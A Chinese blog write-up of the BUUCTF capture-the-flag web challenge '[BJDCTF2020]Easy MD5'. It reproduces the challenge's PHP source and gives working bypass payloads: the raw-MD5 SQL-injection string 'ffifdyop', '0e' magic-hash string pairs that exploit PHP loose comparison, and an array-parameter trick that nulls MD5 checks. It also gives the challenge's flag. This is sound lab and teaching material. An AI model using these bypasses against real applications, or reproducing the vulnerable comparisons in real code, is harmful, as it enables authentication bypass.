BUUCTF WEB [BJDCTF2020]Easy MD5

最新推荐文章于 2023-07-12 11:34:12 发布

Y1Daa

最新推荐文章于 2023-07-12 11:34:12 发布

阅读量197

点赞数

分类专栏： BUUCTF 文章标签： web安全

本文链接：https://blog.csdn.net/weixin_51412071/article/details/124233297

版权

BUUCTF 专栏收录该内容

43 篇文章 0 订阅

订阅专栏

"本文介绍了如何通过在`leveldo.php`中利用双MD5的特性构造payload，绕过条件判断获取flag。关键步骤包括在文本框输入特定字符串并提交，利用不同字符加密后相同的MD5值特性，最终获取flag{808e87d7-e419-4fab-a9f4-007d229b4c0f}

摘要由CSDN通过智能技术生成

BUUCTF WEB [BJDCTF2020]Easy MD5

源代码

leveldo.php

<?php
header('hint:select * from \'admin\' where password='.'md5($pass,true)');
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        @media all and (min-width:600px) {
            * {
                /*改变width计算为包含边框和内间距*/
                box-sizing: border-box;
            }

            body {
                /*控制页面内容水平和垂直居中*/
                position: relative;
                display: flex;
                height: 550px;
                align-items: center;
                justify-content: center;
                background-size: cover;
                background-repeat: no-repeat;
            }

            /*container*/
            .container {
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
                width: 30%;
                height: 20%;
                border-radius: 8px;
                position: relative;
            }

            /*container end*/

            /*header*/
            #header h1 {
                position: relative;
                text-align: center;
            }

            /*header end*/
            /*main*/
            .main {
                align-items: center;
                justify-content: center;
                position: relative;
                width: 100%;
                height: 100%;
            }

            .main section {
                width: 50%;
                margin-left: 22%;
            }

            .main section .upload {
                width: 400px;
            }

            .main section .upload .in{
                margin-top: 10%;
                border-radius:10px;
                font-size: 17px;
                color: rgba(44, 44, 44, 0.582);
                font-family: "Microsoft YaHei";
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
            }

            .main section .upload .give{
                margin-left: 10px;
                border-radius:10px;
                color: rgba(44, 44, 44, 0.582);
                font-size: 17px;
                font-family: "Microsoft YaHei";
                border: white solid 3px;
                background-color: white;
            }

            /*main end*/
        }
    </style>
</head>

<body>
    <div class="container">
        <div id="header">
        </div><!-- /header end -->
        <div class="main">

            <section>
                <form class="upload" action="leveldo4.php" method="GET">
                    <input type="text" id="name" name='password' class="in">
                    <input type="submit" class="give">
                </form>
            </section>
        </div><!-- /main end -->

    </div><!-- /container end -->
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</body>

</html>



<?php
error_reporting(0);
$password = $_GET['password'];

if($password == 'ffifdyop')
{
    echo "<script>window.location.replace('./levels91.php')</script>";
}

?>

levels91.php

<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
    header('Location: levell14.php');
-->

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        span {
            position: relative;
            display: flex;
            width: 100%;
            height: 700px;
            align-items: center;
            font-size: 70px;
            font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            justify-content: center;
        }
    </style>
</head>

<body>
    <span>Do You Like MD5?</span>
</body>

</html>

<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    echo "<script>window.location.replace('./levell14.php')</script>";
}
?>

levell14.php

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

flag.php

<?php

$flag = file_get_contents('/flag');

分析

leveldo.php中的关键代码

$password = $_GET['password'];

if($password == 'ffifdyop')
{
    echo "<script>window.location.replace('./levels91.php')</script>";
}

在文本栏中输入ffifdyop并提交，跳转至levels91.php

levels91.php中的关键代码

$a = $_GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    echo "<script>window.location.replace('./levell14.php')</script>";
}

这里涉及到双md5的弱类型比较绕过

md5("s1885207154a") => 0e509367213418206700842008763514
md5("s1836677006a") => 0e481036490867661113260034900752

这两个字符加密后均为0e开头，PHP会将其识别为科学表达式，不论后缀是什么，他们的值均为0

所以可以构造payload

/levels91.php?a=s1885207154a&b=s1836677006a

跳转至levell14.php

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

PHP中存在一个特性

md5([1,2,3]) == md5([4,5,6]) == NULL

所以当我们传入数组时就能够绕过这个过滤

param1[]=1&param2[]=2

获得flag

flag{808e87d7-e419-4fab-a9f4-007d229b4c0f}

Y1Daa

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
BUUCTF WEB [BJDCTF2020]Easy MD5

BUUCTF WEB [BJDCTF2020]Easy MD5源代码leveldo.php<?phpheader('hint:select * from \'admin\' where password='.'md5($pass,true)');?><!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <meta http-equiv=
复制链接

扫一扫

专栏目录